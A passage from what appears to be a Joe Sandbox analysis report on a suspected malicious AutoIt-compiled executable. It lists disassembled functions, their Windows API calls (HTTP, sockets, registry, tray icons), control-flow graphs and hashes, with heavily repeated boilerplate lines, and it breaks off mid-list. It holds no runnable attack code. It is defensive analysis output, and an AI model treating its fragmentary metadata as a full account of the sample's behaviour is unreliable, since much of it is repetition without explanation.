                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ConnectRegistry_memmove_wcslen
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 15295421-0
                                                                                                                                                                                                                                                            • Opcode ID: d39b2af1ed21ce13ea9b5c2d4aec4a7f6f547b1900bf74f1e4f00604a748ca0e
                                                                                                                                                                                                                                                            • Instruction ID: 33baa24a15bb30b806ffdc3d4c8c2128b8dbdbb38b4108e5c3e965d5e336c96e
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d39b2af1ed21ce13ea9b5c2d4aec4a7f6f547b1900bf74f1e4f00604a748ca0e
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 89E17471204200ABD714EF69CD85F2BB7E8AF88704F14891EF985DB381D779E941CB9A
                                                                                                                                                                                                                                                            Function 0040A780 Relevance: 16.6, APIs: 8, Strings: 1, Instructions: 881COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _malloc
                                                                                                                                                                                                                                                            • String ID: Default
                                                                                                                                                                                                                                                            • API String ID: 1579825452-753088835
                                                                                                                                                                                                                                                            • Opcode ID: a3e4b55106fa688c5f94f0146bd267cff11ee882b1dfb7c9286b26d2cf852227
                                                                                                                                                                                                                                                            • Instruction ID: a673259d86369fb9501a746496732cc59a2062e12c9a0651055f0cdb6904a52b
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a3e4b55106fa688c5f94f0146bd267cff11ee882b1dfb7c9286b26d2cf852227
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 13729DB06043019FD714DF25D481A2BB7E5EF85314F14882EE986AB391D738EC56CB9B
                                                                                                                                                                                                                                                            Function 0040F5C0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 125COMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 2473 40f5c0-40f5cf call 422240 2476 40f5d0-40f5e8 2473->2476 2476->2476 2477 40f5ea-40f613 call 413650 call 410e60 2476->2477 2482 40f614-40f633 call 414d04 2477->2482 2485 40f691 2482->2485 2486 40f635-40f63c 2482->2486 2487 40f696-40f69c 2485->2487 2488 40f660-40f674 call 4150d1 2486->2488 2489 40f63e 2486->2489 2493 40f679-40f67c 2488->2493 2490 40f640 2489->2490 2492 40f642-40f650 2490->2492 2494 40f652-40f655 2492->2494 2495 40f67e-40f68c 2492->2495 2493->2482 2496 40f65b-40f65e 2494->2496 2497 425d1e-425d3e call 4150d1 call 414d04 2494->2497 2498 40f68e-40f68f 2495->2498 2499 40f69f-40f6ad 2495->2499 2496->2488 2496->2490 2509 425d43-425d5f call 414d30 2497->2509 2498->2494 2500 40f6b4-40f6c2 2499->2500 2501 40f6af-40f6b2 2499->2501 2503 425d16 2500->2503 2504 40f6c8-40f6d6 2500->2504 2501->2494 2503->2497 2506 425d05-425d0b 2504->2506 2507 40f6dc-40f6df 2504->2507 2506->2492 2510 425d11 2506->2510 2507->2494 2509->2487 2510->2503
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: __fread_nolock_fseek_memmove_strcat
                                                                                                                                                                                                                                                            • String ID: AU3!$EA06
                                                                                                                                                                                                                                                            • API String ID: 1268643489-2658333250
                                                                                                                                                                                                                                                            • Opcode ID: 2bf944a422d814460d06cfc7cd8a6c131d3cd46aa2c5a852c72b19ddfb5272df
                                                                                                                                                                                                                                                            • Instruction ID: 581a58983a44a30c9dde9fea67fd4d6d070b0eb534c71953d0d39c84ae2506d9
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2bf944a422d814460d06cfc7cd8a6c131d3cd46aa2c5a852c72b19ddfb5272df
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A541EF3160414CABCB21DF64D891FFD3B749B15304F2808BFF581A7692EA79A58AC754
                                                                                                                                                                                                                                                            Function 0044AA86 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 174networkCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AAC5
                                                                                                                                                                                                                                                            • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AAFA
                                                                                                                                                                                                                                                            • InternetQueryOptionW.WININET(00000000,0000001F,00000000,00001000), ref: 0044AB5E
                                                                                                                                                                                                                                                            • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0044AB74
                                                                                                                                                                                                                                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB83
                                                                                                                                                                                                                                                            • HttpQueryInfoW.WININET(00000000,00000005,?,00001000,00000000), ref: 0044ABBB
                                                                                                                                                                                                                                                              • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1291720006-3916222277
                                                                                                                                                                                                                                                            • Opcode ID: 94ee1e3e258d452f192cdcaedec96fbb0156848484ac1a69a6464526fb86115e
                                                                                                                                                                                                                                                            • Instruction ID: 89538bfc19842651326e528327905a39262a83d8aa3acd63c003c629d13479a9
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 94ee1e3e258d452f192cdcaedec96fbb0156848484ac1a69a6464526fb86115e
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FA51B1756403087BF710DF56DC86FEBB7A8FB88715F00851EFB0196281D7B8A5148BA8
                                                                                                                                                                                                                                                            Function 00401100 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136windowtimeregistryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 2552 401100-401111 2553 401113-401119 2552->2553 2554 401179-401180 2552->2554 2555 401144-40114a 2553->2555 2556 40111b-40111e 2553->2556 2554->2553 2557 401182 2554->2557 2559 401184-40118e call 401250 2555->2559 2560 40114c-40114f 2555->2560 2556->2555 2558 401120-401126 2556->2558 2561 40112c-401141 DefWindowProcW 2557->2561 2558->2561 2563 42b038-42b03f 2558->2563 2566 401193-40119a 2559->2566 2564 401151-401157 2560->2564 2565 40119d 2560->2565 2563->2561 2571 42b045-42b059 call 401000 call 40e0c0 2563->2571 2569 401219-40121f 2564->2569 2570 40115d 2564->2570 2567 4011a3-4011a9 2565->2567 2568 42afb4-42afc5 call 40f190 2565->2568 2567->2558 2572 4011af 2567->2572 2568->2566 2569->2558 2575 401225-42b06d call 468b0e 2569->2575 2573 401163-401166 2570->2573 2574 42b01d-42b024 2570->2574 2571->2561 2572->2558 2578 4011b6-4011d8 KillTimer call 401000 PostQuitMessage 2572->2578 2579 4011db-401202 SetTimer RegisterWindowMessageW 2572->2579 2581 42afe9-42b018 call 40f190 call 401a50 2573->2581 2582 40116c-401172 2573->2582 2574->2561 2580 42b02a-42b033 call 4370f4 2574->2580 2575->2566 2579->2566 2590 401204-401216 CreatePopupMenu 2579->2590 2580->2561 2581->2561 2582->2558 2592 401174-42afde call 45fd57 2582->2592 2592->2561 2603 42afe4 2592->2603 2603->2566
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • DefWindowProcW.USER32(?,?,?,?,?,?,?,004010F8,?,?,?), ref: 00401136
                                                                                                                                                                                                                                                            • KillTimer.USER32(?,00000001,?), ref: 004011B9
                                                                                                                                                                                                                                                            • PostQuitMessage.USER32(00000000), ref: 004011CB
                                                                                                                                                                                                                                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004011E5
                                                                                                                                                                                                                                                            • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,004010F8,?,?,?), ref: 004011F0
                                                                                                                                                                                                                                                            • CreatePopupMenu.USER32 ref: 00401204
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                                                                                                                                                            • String ID: TaskbarCreated
                                                                                                                                                                                                                                                            • API String ID: 129472671-2362178303
                                                                                                                                                                                                                                                            • Opcode ID: 3a68920b2457bf0ecdafc1b2be4b40edda77bb20db2372f596e363752a538359
                                                                                                                                                                                                                                                            • Instruction ID: c871ea33cf18a3cc9178abcaf30b48d6b70312a550ef0fd47f6a389c1f0ea6f4
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3a68920b2457bf0ecdafc1b2be4b40edda77bb20db2372f596e363752a538359
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1E417932B0420497DB28DB68EC85BBE3355E759320F10493FFA11AB6F1C67D9850879E
                                                                                                                                                                                                                                                            Function 004115D7 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 41COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • _malloc.LIBCMT ref: 004115F1
                                                                                                                                                                                                                                                              • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                                                                                                                                                                                                                              • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                                                                                                                                                                                                                              • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                                                                                                                                                                                                            • std::exception::exception.LIBCMT ref: 00411626
                                                                                                                                                                                                                                                            • std::exception::exception.LIBCMT ref: 00411640
                                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                                                                                                                                                                                                                            • String ID: ,*H$4*H$@fI
                                                                                                                                                                                                                                                            • API String ID: 615853336-1459471987
                                                                                                                                                                                                                                                            • Opcode ID: 82e626e187fd93f0b78ce583db7f2dc4e80f05ba1730a5b6497a9883058244d9
                                                                                                                                                                                                                                                            • Instruction ID: 1677ae912bb9c86ef767233b76c14da205579da8f33ef274bedc9cd0e4e1b94c
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 82e626e187fd93f0b78ce583db7f2dc4e80f05ba1730a5b6497a9883058244d9
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C5F0F9716001196BCB24AB56DC01AEE7AA5AB40708F15002FF904951A1CBB98AC2875D
                                                                                                                                                                                                                                                            Function 0046C84C Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 308COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 0046C96E
                                                                                                                                                                                                                                                              • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                                                                                                                                                                                                              • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                                                                                                                                                                                                                              • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                                                                                                                                                                                                                                                              • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                                                                                                                                                                                                                                                              • Part of subcall function 00451B42: VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Variant$Copy$ClearErrorInitLast
                                                                                                                                                                                                                                                            • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                                                                                                                                                            • API String ID: 3207048006-625585964
                                                                                                                                                                                                                                                            • Opcode ID: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                                                                                                                                                                                                                                            • Instruction ID: 684ba17e2c3ca727561f7970afa8535519679aefa5cdc663b381c32651820a10
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F6A19472600209ABDB10DF99DCC1EFEB3B9FB84714F10852EF604A7281E7B59D458BA5
                                                                                                                                                                                                                                                            Function 0046D230 Relevance: 10.7, APIs: 7, Instructions: 170networkCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • select.WS2_32(00000000,?,00000000,00000000,?), ref: 0046D3D3
                                                                                                                                                                                                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 0046D3E4
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ErrorLastselect
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 215497628-0
                                                                                                                                                                                                                                                            • Opcode ID: 4e302e3fa849b8acb77fa5220534cc64e6b469500e62c64a740d882823f4ada3
                                                                                                                                                                                                                                                            • Instruction ID: fadcceb5308e48970113ceaff65c18732520a09434288b0a98514d96d8681c7b
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4e302e3fa849b8acb77fa5220534cc64e6b469500e62c64a740d882823f4ada3
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 65510772E001046BD710EF69DC85FAEB3A8EB94320F14856EF905D7381EA35DD41C7A5
                                                                                                                                                                                                                                                            Function 004102B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 87COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                                                                                                                                                                                                                            • SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                                                                                                                                                                                                                            • _wcsncpy.LIBCMT ref: 004102ED
                                                                                                                                                                                                                                                            • SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                                                                                                                                                                                                                            • _wcsncpy.LIBCMT ref: 00410340
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _wcsncpy$DesktopFolderFromListMallocPath
                                                                                                                                                                                                                                                            • String ID: C:\Users\user\Desktop\LKxcbzlwkz.exe
                                                                                                                                                                                                                                                            • API String ID: 3170942423-3699295950
                                                                                                                                                                                                                                                            • Opcode ID: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                                                                                                                                                                                                                                            • Instruction ID: 8627f7bfe00d67ecf541507c27de0d1a6b0c746b93627a891ac6cfe5d1469166
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4B219475A00619ABCB14DBA4DC84DEFB37DEF88700F108599F909D7210E674EE45DBA4
                                                                                                                                                                                                                                                            Function 00401250 Relevance: 10.6, APIs: 7, Instructions: 86windowtimeCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 00401B80: _wcsncpy.LIBCMT ref: 00401C41
                                                                                                                                                                                                                                                              • Part of subcall function 00401B80: _wcscpy.LIBCMT ref: 00401C5D
                                                                                                                                                                                                                                                              • Part of subcall function 00401B80: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                                                                                                                                                                                                                                            • KillTimer.USER32(?,?,?,?,?), ref: 004012D3
                                                                                                                                                                                                                                                            • SetTimer.USER32(?,?,000002EE,00000000), ref: 004012E2
                                                                                                                                                                                                                                                            • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 0042730F
                                                                                                                                                                                                                                                            • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00427363
                                                                                                                                                                                                                                                            • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 004273AE
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
